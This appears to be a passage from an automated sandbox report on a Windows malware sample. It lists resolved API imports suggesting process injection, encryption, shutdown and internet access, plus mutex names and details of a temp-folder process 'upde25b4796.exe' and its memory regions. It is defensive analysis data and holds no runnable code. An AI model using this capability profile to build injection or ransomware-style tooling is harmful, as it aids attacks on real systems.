Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAllocEx, address_out = 0x759ed9b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x759d2d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77ce45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x759ddd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x759d14e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SystemTimeToFileTime, address_out = 0x759d5a7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalMemoryStatusEx, address_out = 0x759fd4c4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x759d103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x759d170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedIncrement, address_out = 0x759d1400	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTime, address_out = 0x759d5a96	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFreeEx, address_out = 0x759ed9c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsBadReadPtr, address_out = 0x759fd075	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x759ed5cd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexW, address_out = 0x759d5151	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x759ece2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x759d17ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x759d469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x759d1809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x759d1b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExW, address_out = 0x759d1ae5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DuplicateHandle, address_out = 0x759d1886	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x759d1245	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AddVectoredExceptionHandler, address_out = 0x77d2742b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x759d7a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x759d11f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x759f830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiA, address_out = 0x759d3e8e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsWow64Process, address_out = 0x759d195e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstChangeNotificationW, address_out = 0x759ed851	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextChangeNotification, address_out = 0x759f5c1e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessInJob, address_out = 0x759fc7ea	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateRemoteThread, address_out = 0x75a5416b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateNamedPipeW, address_out = 0x75a5414b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DisconnectNamedPipe, address_out = 0x75a541df	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ConnectNamedPipe, address_out = 0x75a540fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x759d5371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeW, address_out = 0x759d418b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultUILanguage, address_out = 0x759d44ab	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x759f3b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableW, address_out = 0x759d1b48	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x759d17d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x77ce2c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x759d465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x759d192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x759ed4f7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x759d1986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileTime, address_out = 0x759d4407	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseMutex, address_out = 0x759d111e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77cd2270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x759d4950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileTime, address_out = 0x759eecbb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveDirectoryW, address_out = 0x75a544cf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x759d1856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExpandEnvironmentStringsW, address_out = 0x759d4173	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x759d1282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x759d54ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77cd22b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x759d1b18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x759d4442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenEventW, address_out = 0x759d15d6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTempPathW, address_out = 0x759ed4dc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x759d11a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x759d14c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapCreate, address_out = 0x759d4a2d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteProcessMemory, address_out = 0x759ed9e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x759d59e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x759d4435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedExchange, address_out = 0x759d1462	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeInformationW, address_out = 0x759ec860	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x759d3ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x759d4259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x759d34c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x759d34b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x759d1222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x759d492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x759f8baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x759f896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x759d11c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x759f735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x759d3f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexW, address_out = 0x759d424c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResetEvent, address_out = 0x759d16dd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x759d1410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEvent, address_out = 0x759d16c5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x759d10ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x759d183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x759d1136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForMultipleObjects, address_out = 0x759d4220	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x759d110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x759d186e	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetIconInfo, address_out = 0x758e49ea	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DrawIcon, address_out = 0x758e8deb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadImageW, address_out = 0x758dfbd1	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetCursorPos, address_out = 0x758e1218	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x77ce25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x758d8a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UnregisterClassW, address_out = 0x758d9f84	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetKeyboardLayoutList, address_out = 0x758e2e69	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerA, address_out = 0x758e3e75	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharToOemW, address_out = 0x75931a26	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x758d7809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x758e05ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x758d787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x758db17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetWindowLongA, address_out = 0x758e6110	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetWindowLongA, address_out = 0x758dd156	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperW, address_out = 0x758df350	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x758d9a55	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptImportPublicKeyInfo, address_out = 0x76256c0e	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptDecodeObjectEx, address_out = 0x7624d718	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x7775469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetAce, address_out = 0x777545f0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x7776779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x77750e0c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AllocateAndInitializeSid, address_out = 0x777540e6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthority, address_out = 0x77750e24	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetEntriesInAclW, address_out = 0x77752a66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExW, address_out = 0x777540fe	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptVerifySignatureW, address_out = 0x7774c54a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetNamedSecurityInfoW, address_out = 0x77749fe2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetNamedSecurityInfoW, address_out = 0x7774f4fd	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x7774df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x7774df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorSacl, address_out = 0x77754680	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x777514d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x7774df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenProcessToken, address_out = 0x77754304	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = FreeSid, address_out = 0x7775412e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitializeSecurityDescriptor, address_out = 0x77754620	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x7775468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x7774c532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenThreadToken, address_out = 0x7775432c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x777546ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x7774e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetTokenInformation, address_out = 0x7775431c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyKey, address_out = 0x7774c51a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AdjustTokenPrivileges, address_out = 0x7775418e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorDacl, address_out = 0x7775415e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x77754608	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = LookupPrivilegeValueW, address_out = 0x777541b3	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetLengthSid, address_out = 0x7775413b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteValueW, address_out = 0x7774cf31	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegFlushKey, address_out = 0x7776773f	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegNotifyChangeKeyValue, address_out = 0x7774e15b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryInfoKeyW, address_out = 0x777546e7	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyW, address_out = 0x7775445b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitiateSystemShutdownExW, address_out = 0x7779db3a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x7774df14	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x76a83c71	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x76a91e46	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x76af5708	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x763845bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsURLW, address_out = 0x763855bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryEmptyW, address_out = 0x763acd81	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrCmpNIW, address_out = 0x76384745	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRenameExtensionW, address_out = 0x763ad32a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrStrIW, address_out = 0x763846e9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathMatchSpecW, address_out = 0x763886f7	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathCombineW, address_out = 0x7638c39c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x76383248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAddBackslashW, address_out = 0x7638c177	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfW, address_out = 0x763b066c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathUnquoteSpacesW, address_out = 0x76385331	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathSkipRootW, address_out = 0x7639fbf5	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x7638a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = SHDeleteValueW, address_out = 0x7637fcca	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfA, address_out = 0x7639edfe	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryW, address_out = 0x7637ff07	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveBackslashW, address_out = 0x76385c62	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = UrlUnescapeA, address_out = 0x7639c6fb	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathQuoteSpacesW, address_out = 0x763ace21	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleFileNameExW, address_out = 0x75ad13f0	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromString, address_out = 0x75afe599	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeEx, address_out = 0x75b209ad	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CreateStreamOnHGlobal, address_out = 0x75b0363b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoSetProxyBlanket, address_out = 0x75af5ea5	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75b29d0b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x75b286d3	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteObject, address_out = 0x76965689	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = GetDeviceCaps, address_out = 0x76964de0	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateDCW, address_out = 0x7696e743	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleDC, address_out = 0x769654f4	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = SelectObject, address_out = 0x76964f70	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleBitmap, address_out = 0x76965f49	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = BitBlt, address_out = 0x76965ea6	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteDC, address_out = 0x769658b3	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetConnectA, address_out = 0x75f449e9	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x75f3b406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoA, address_out = 0x75f3a33e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetQueryOptionA, address_out = 0x75f31b56	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpOpenRequestA, address_out = 0x75f44c7d	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCrackUrlA, address_out = 0x75f2d075	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetSetOptionA, address_out = 0x75f375e8	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x75f4f18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x75f3ab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpSendRequestA, address_out = 0x75fb18f8	1	Fn
Get Address	c:\windows\syswow64\urlmon.dll	function = ObtainUserAgentString, address_out = 0x766c1d76	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x761b3eae	1	Fn
Get Address	c:\windows\syswow64\secur32.dll	function = GetUserNameExW, address_out = 0x7582a415	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtQuerySystemInformation, address_out = 0x77ccfda0	1	Fn

System (70)

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	3	Fn
Sleep	duration = 20000 milliseconds (20.000 seconds)	1	Fn
Get Info	type = Operating System	52	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	7	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	7	Fn

Mutex (7)

Operation	Additional Information	Count	Logfile
Create	mutex_name = 20BC29E135FB9B01285187E3B5593CC8	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Create	mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4	1	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Release	mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4	1	Fn

Process #20: upde25b4796.exe

(Host: 676, Network: 0)

Information	Value
ID	#20
File Name	c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe
Command Line	"C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:05:18, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:04:55

OS Process Information

Information	Value
PID	0x594
Parent PID	0x320 (c:\windows\syswow64\svchost.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 548 0x 7D8

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000210000	0x00210000	0x0021ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000220000	0x00220000	0x00226fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000240000	0x00240000	0x00247fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000250000	0x00250000	0x002cffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000002d0000	0x002d0000	0x003aefff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000003b0000	0x003b0000	0x003b0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000003c0000	0x003c0000	0x003cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003d0000	0x003d0000	0x003fffff	Private Memory	Readable, Writable	Region Actions
upde25b4796.exe	0x00400000	0x00432fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000400000	0x00400000	0x0041bfff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000440000	0x00440000	0x004bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000004f0000	0x004f0000	0x005effff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000005f0000	0x005f0000	0x00777fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000780000	0x00780000	0x00900fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000910000	0x00910000	0x01d0ffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001d10000	0x01d10000	0x01ebffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001d10000	0x01d10000	0x01e2ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001d10000	0x01d10000	0x01d4ffff	Private Memory	Readable, Writable	Region Actions
rsaenh.dll	0x01d50000	0x01d8bfff	Memory Mapped File	Readable	Region Actions
private_0x0000000001df0000	0x01df0000	0x01e2ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001eb0000	0x01eb0000	0x01ebffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ec0000	0x01ec0000	0x022bffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x022c0000	0x0258efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002590000	0x02590000	0x0270ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002590000	0x02590000	0x026affff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002590000	0x02590000	0x0268ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000026a0000	0x026a0000	0x026affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000026d0000	0x026d0000	0x0270ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002710000	0x02710000	0x028fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002710000	0x02710000	0x0288ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002710000	0x02710000	0x027dffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002850000	0x02850000	0x0288ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000028c0000	0x028c0000	0x028fffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002900000	0x02900000	0x02cf2fff	Pagefile Backed Memory	Readable	Region Actions
staticcache.dat	0x02d00000	0x0362ffff	Memory Mapped File	Readable	Region Actions
private_0x0000000003630000	0x03630000	0x0b62ffff	Private Memory	Readable, Writable, Executable	Region Actions
msvbvm60.dll	0x72940000	0x72a92fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x74130000	0x74142fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x741b0000	0x7422ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x743d0000	0x743d7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x743e0000	0x7443bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74440000	0x7447efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sxs.dll	0x74e30000	0x74e8efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
